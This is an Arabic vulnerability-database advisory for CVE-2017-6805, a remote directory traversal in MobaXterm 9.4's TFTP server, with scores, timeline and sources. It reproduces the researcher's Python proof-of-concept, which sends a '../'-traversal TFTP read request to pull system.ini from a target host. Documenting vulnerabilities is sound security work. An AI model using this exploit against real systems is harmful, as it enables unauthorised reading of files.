| CVSS الدرجة المؤقتة للميتا | سعر الإكسبلويت الحالي (≈) | درجة اهتمام CTI |
|---|---|---|
| 5.4 | $0-$5k | 0.00 |
الملخص
تم أكتشاف ثغرة أمنية في MobaXterm Personal Edition 9.4. وقد تم تصنيفها على أنها خطيرة. الثغرة الأمنية متواجدة في دالة غير معروفة من العنصر tftp. تؤدي عملية التلاعب إلى اجتياز الدليل. أسم الثغرة الأمنية هوCVE-2017-6805. الهجوم يمكن أن يتم عن بُعد. أيضًا، هناك استغلال متوفر.
التفاصيل
تم أكتشاف ثغرة أمنية في MobaXterm Personal Edition 9.4. وقد تم تصنيفها على أنها خطيرة. الثغرة الأمنية متواجدة في دالة غير معروفة من العنصر tftp. تؤدي عملية التلاعب إلى اجتياز الدليل. عند استخدام CWE لتحديد المشكلة، سيتم التوجيه إلى CWE-22. تم اكتشاف الثغرة في 12/03/2017. تم الإعلان عن الثغرة 13/03/2017 من قبل John Page (hyp3rlinx) تحت CVE-2017-6805 MobaXterm Personal Edition v9.4 Directory Traversal File Disclosure كنوع Mailinglist Post (Full-Disclosure). يمكن عرض الاستشارة من هنا seclists.org. تم نشر هذه البيانات من دون علم الشركة المالكة.
أسم الثغرة الأمنية هوCVE-2017-6805. تم تعيين CVE في 10/03/2017. الهجوم يمكن أن يتم عن بُعد. لا يوجد شرح تقني متاح. هذه الثغرة ليست شائعة مقارنة بالمتوسط. أيضًا، هناك استغلال متوفر. تم الكشف عن الاستغلال للعامة وقد يتم استخدامه. مشروع ميتري اتاك يصنف اسلوب الهجوم هذا على انه T1006.
إذا تم تحديد إثبات المفهوم، فإنه يُعلن كـ إثبات المفهوم. تستطيع تحميل الإكسبلويت من هنا seclists.org. لكونها ثغرة هجوم فوري متوسط سعرها كان$0-$5k. الكود المستخدم في الاستغلال هو:
import sys,socketprint 'MobaXterm TFTP Directory Traversal 0day Exploit' print 'Read Windows/system.ini' print 'hyp3rlinx \n'
HOST = raw_input("[IP]>") FILE = 'Windows/system.ini' PORT = 69
PAYLOAD = "\x00\x01" #TFTP Read PAYLOAD += "../" * 4 + FILE + "\x00" #Read system.ini using directory traversal PAYLOAD += "netascii\x00" #TFTP Type
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(PAYLOAD, (HOST, PORT)) out = s.recv(1024) s.close()
print "Victim Data located on : %s " %(HOST) print out.strip()
جاء في التحذير ما يلي:
Vendor Notification: No Reply
في حال وجود عناصر في source_databases_list، فإن هذه الثغرة موثقة أيضًا في قواعد بيانات ثغرات أخرى: SecurityFocus (BID 96886).
منتج
النوع
الأسم
النسخة
CPE 2.3
CPE 2.2
فيديو

CVSSv4
VulDB متجه: 🔍VulDB الاعتمادية: 🔍
CVSSv3
VulDB الدرجة الأساسية للميتا: 5.9VulDB الدرجة المؤقتة للميتا: 5.6
VulDB الدرجة الأساسية: 6.5
VulDB الدرجة المؤقتة: 5.9
VulDB متجه: 🔍
VulDB الاعتمادية: 🔍
NVD الدرجة الأساسية: 5.3
NVD متجه: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| متجه | التعقيد | توثيق | السرية | الأمانة | التوفر |
|---|---|---|---|---|---|
| افتح | افتح | افتح | افتح | افتح | افتح |
| افتح | افتح | افتح | افتح | افتح | افتح |
| افتح | افتح | افتح | افتح | افتح | افتح |
VulDB الدرجة الأساسية: 🔍
VulDB الدرجة المؤقتة: 🔍
VulDB الاعتمادية: 🔍
NVD الدرجة الأساسية: 🔍
استغلال
الفئة: اجتياز الدليلCWE: CWE-22
CAPEC: 🔍
ATT&CK: 🔍
ملموس: لا
محلي: لا
عن بُعد: نعم
التوفر: 🔍
وصول: عام
الحالة: إثبات المفهوم
المؤلف: John Page
تحميل: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
تقدير السعر: 🔍
تقدير السعر الحالي: 🔍
| 0-Day | افتح | افتح | افتح | افتح |
|---|---|---|---|---|
| اليوم | افتح | افتح | افتح | افتح |
Exploit-DB: 🔍
استخبارات التهديد
الاهتمام: 🔍الفاعلون النشطون: 🔍
مجموعات APT النشطة: 🔍
إجراءات مضادة
التوصية: لا يوجد تخفيف معروفالحالة: 🔍
زمن الهجوم الفوري: 🔍
وقت تأخير الاستغلال: 🔍
الجدول الزمني
10/03/2017 🔍12/03/2017 🔍
13/03/2017 🔍
13/03/2017 🔍
13/03/2017 🔍
17/03/2017 🔍
20/03/2017 🔍
09/09/2020 🔍
المصادر
استشارة: CVE-2017-6805 MobaXterm Personal Edition v9.4 Directory Traversal File Disclosureباحث: John Page (hyp3rlinx)
الحالة: غير معرفة
CVE: CVE-2017-6805 (🔍)
GCVE (CVE): GCVE-0-2017-6805
GCVE (VulDB): GCVE-100-98210
SecurityFocus: 96886 - MobaXterm Personal Edition CVE-2017-6805 Directory Traversal Vulnerability
OSVDB: - CVE-2017-6805 - MobaXterm Personal Edition - Directory Traversal Issue
scip Labs: https://www.scip.ch/en/?labs.20161013
إدخال
تم الإنشاء: 17/03/2017 08:07 AMتم التحديث: 09/09/2020 02:47 PM
التغييرات: 17/03/2017 08:07 AM (71), 09/09/2020 02:47 PM (5)
كامل: 🔍
Cache ID: 216::103
If you want to get best quality of vulnerability data, you may have to visit VulDB.
لا توجد تعليقات بعد اللغات: ar + fa + en.
يرجى تسجيل الدخول حتى تتمكن من التعليق